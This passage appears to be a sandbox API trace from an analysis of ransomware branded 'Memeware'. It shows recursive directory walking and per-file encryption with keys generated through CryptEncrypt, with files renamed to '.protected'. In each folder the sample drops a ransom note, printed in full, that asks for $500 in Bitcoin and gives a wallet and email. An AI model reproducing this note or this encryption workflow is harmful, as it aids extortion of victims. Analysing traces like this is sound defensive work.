lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.509] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.509] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.509] 
lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.509] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.509] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.509] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\.") returned 85 [0084.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.509] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.509] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.509] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.509] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.509] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.509] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.509] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\..") returned 86 [0084.509] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.509] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.509] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.509] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.509] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\RESTORE_FILES.txt") returned 101 [0084.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.510] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.510] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.510] lstrlenA 
(lpString="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") returned 684 [0084.510] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.510] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.511] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.511] CloseHandle (hObject=0x150) returned 1 [0084.511] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.511] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.511] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\RESTORE_FILES.txt") returned 89 [0084.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.511] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.511] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.512] lstrlenA (lpString="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") returned 684 [0084.512] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.512] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.512] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.512] CloseHandle (hObject=0x14c) returned 1 [0084.512] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.512] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.512] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\RESTORE_FILES.txt") returned 79 [0084.512] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.512] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.512] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.513] lstrlenA (lpString="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") returned 684 [0084.513] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.513] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.513] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.513] CloseHandle (hObject=0xd8) returned 1 [0084.514] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.514] lstrcmpiW (lpString1="CrashReports", lpString2="Windows") returned -1 [0084.514] lstrcmpiW (lpString1="CrashReports", lpString2="Program Files") returned -1 [0084.514] lstrcmpiW (lpString1="CrashReports", lpString2="Program Files (x86)") returned -1 [0084.514] lstrcmpiW (lpString1="CrashReports", lpString2="$Recycle.bin") returned 1 [0084.514] lstrcmpiW (lpString1="CrashReports", lpString2="System Volume Information") returned -1 [0084.514] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports") returned 67 [0084.514] lstrcmpW (lpString1="CrashReports", lpString2=".") returned 1 [0084.514] lstrcmpW (lpString1="CrashReports", lpString2="..") returned 1 [0084.515] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\*") returned 69 [0084.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.515] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.515] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.515] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.515] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.515] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.515] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\.") returned 69 [0084.515] lstrcmpW (lpString1=".", lpString2=".") returned 0 
[0084.515] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.515] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.515] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.515] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.515] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.515] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.515] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\..") returned 70 [0084.515] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.515] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.515] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.515] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.515] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\RESTORE_FILES.txt") returned 85 [0084.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\crashreports\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.516] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.516] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.516] lstrlenA (lpString="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") returned 684 [0084.516] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.516] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.516] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.516] CloseHandle (hObject=0xd8) returned 1 [0084.516] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0084.516] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0084.517] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\RESTORE_FILES.txt") returned 72 [0084.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0084.517] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.517] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0084.518] lstrlenA (lpString="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") returned 684 [0084.518] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0084.518] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.518] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.518] CloseHandle (hObject=0xd4) returned 1 [0084.518] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0084.518] lstrcmpiW (lpString1="History", lpString2="Windows") returned -1 [0084.518] lstrcmpiW (lpString1="History", lpString2="Program Files") returned -1 [0084.518] lstrcmpiW (lpString1="History", lpString2="Program Files (x86)") returned -1 [0084.518] lstrcmpiW (lpString1="History", lpString2="$Recycle.bin") returned 1 [0084.518] lstrcmpiW (lpString1="History", lpString2="System Volume Information") returned -1 [0084.518] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History") returned 55 [0084.518] lstrcmpW (lpString1="History", lpString2=".") returned 1 [0084.518] lstrcmpW (lpString1="History", lpString2="..") returned 1 [0084.518] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\*") returned 57 [0084.518] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0xffffffff [0084.519] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0084.519] lstrcmpiW (lpString1="IconCache.db", lpString2="Windows") returned -1 [0084.519] lstrcmpiW (lpString1="IconCache.db", lpString2="Program Files") returned -1 [0084.519] lstrcmpiW (lpString1="IconCache.db", lpString2="Program Files (x86)") returned -1 [0084.519] lstrcmpiW (lpString1="IconCache.db", lpString2="$Recycle.bin") returned 1 [0084.519] lstrcmpiW (lpString1="IconCache.db", lpString2="System Volume Information") returned -1 [0084.519] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\IconCache.db") returned 60 [0084.519] StrStrIW (lpFirst="IconCache.db", lpSrch=".protected") returned 0x0 [0084.520] lstrcmpW (lpString1="IconCache.db", lpString2="RESTORE_FILES.txt") returned -1 [0084.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0084.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0084.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0084.520] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned 60 [0084.520] StrStrW (lpFirst="IconCache.db", lpSrch=".txt") returned 0x0 [0084.520] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned 60 [0084.520] StrStrW (lpFirst="IconCache.db", lpSrch=".rar") returned 0x0 [0084.520] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned 60 [0084.520] StrStrW (lpFirst="IconCache.db", lpSrch=".zip") returned 0x0 [0084.520] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0084.521] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.521] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: 
lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0084.521] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.521] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0084.522] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0084.522] CloseHandle (hObject=0xd4) returned 1 [0084.522] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.protected") returned 70 [0084.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db.protected")) returned 1 [0084.523] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0084.523] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0084.523] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0084.523] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0084.523] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0084.523] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0084.523] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
